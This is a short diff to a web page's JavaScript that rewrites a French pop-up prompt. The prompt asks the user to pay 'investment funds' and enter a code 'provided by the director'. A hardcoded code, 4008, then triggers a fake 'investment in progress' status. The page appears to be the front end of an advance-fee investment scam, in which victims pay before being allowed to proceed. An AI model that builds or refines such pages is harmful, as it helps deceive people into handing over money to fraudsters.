--- a/confirmation.html
+++ b/confirmation.html
@@ -168,7 +168,7 @@
         `;
 
     document.querySelector('#btn-deblock').addEventListener('click', () => {
-      let code2 = prompt("Chère client veuilez payer les frais de carte d’investissement : Cette carte vous identifie officiellement comme investisseur et vous donne accès à nos services.");
+      let code2 = prompt(" Veuillez payer les Fonds d’investissements et entre de code fourni part le directeur merci.");
       if (code2 === "4008") {
         startProgressBar();
         document.querySelector('#invest').innerText = "En cours d'investissement...";
